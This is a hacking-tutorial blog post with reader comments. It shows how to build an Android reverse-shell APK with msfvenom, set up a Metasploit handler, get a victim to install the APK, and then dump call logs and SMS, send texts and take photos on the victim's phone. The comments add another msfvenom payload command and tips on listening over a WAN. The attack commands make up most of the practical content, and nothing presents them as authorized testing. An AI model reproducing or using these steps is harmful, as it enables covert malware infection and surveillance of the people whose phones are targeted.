Hacking Tools, Kali Linux, Penetration Testing

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

In this article, we will learn how to hack an android device and exploit it according to one’s desires. Android is an operating system based on Linux kernel.   It uses an APK file format to install any application. Hence, our malware will also be in APK format. To construct the malware use the following msfvenom command :

msfvenom -p android/meterpreter/reverse_tcp lhost= lport=1234 > shell.apk

As the msfvenom malware is created, start the handler in order to have a session and for this type :

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost
set lport 1234

Once the exploit is executed, send the APK file to the victim and make sure to run the file in their android phone. As the said file will run, you will have a session as shown in the image below :

Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :

You can check whether the device is rooted or not by using the following command :


You can also dump all the call-logs by using the following command ;


The above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents :

cat <text file name>

You can also send any kind of SMS from the device, remotely, with the following command :

send_sms -d 95******** -t hacked

You can even use the following command to capture a picture :


It will save the picture into a JPEG file.

Similar to dumping the call logs, you can also dump all the SMSs will the following command :


And then you can read the SMS dump file using cat command as shown in the image below :

This way, you can exploit android as the way you like it.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

27 thoughts on “Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

  1. hello akshay,
    hope you are doing well,
    i just wanted to know that i have applied command which you have mentioned above but i am not able to get access of my mobile on . so can you please help me out.
    thank you

  2. when i search for my ip in termux by ifconfig there is two internal ip showing Link encap:Local Loopback
    inet addr: Mask:

    Link encap:Ethernet HWaddr DC:1A:C5:10:47:B3
    inet addr: Bcast: Mask:
    so what is the value of lhost and lport for creating payload

      1. Come on it was just an example IP!
        It would have changed before he published the article

  3. how to hack it using WAN connction my LAN IP is 192.168.x.x and my WAN IP is 49.65.y.y how to set a listening port.

        1. you can use a prameter -o which will be the Path to place the infected file.
          like the given example:

          msfvenom -p android/meterpreter/reverse_tcp –platform android -o /data/data/com.termux/files/home/storage/ LHOST= LPORT=569

  4. Very good blog,thank you very much for your effort in writing the posts.

  5. thank you for your great articles
    is there a way to dump the last sms instead of all of it?

Comments are closed.

%d bloggers like this: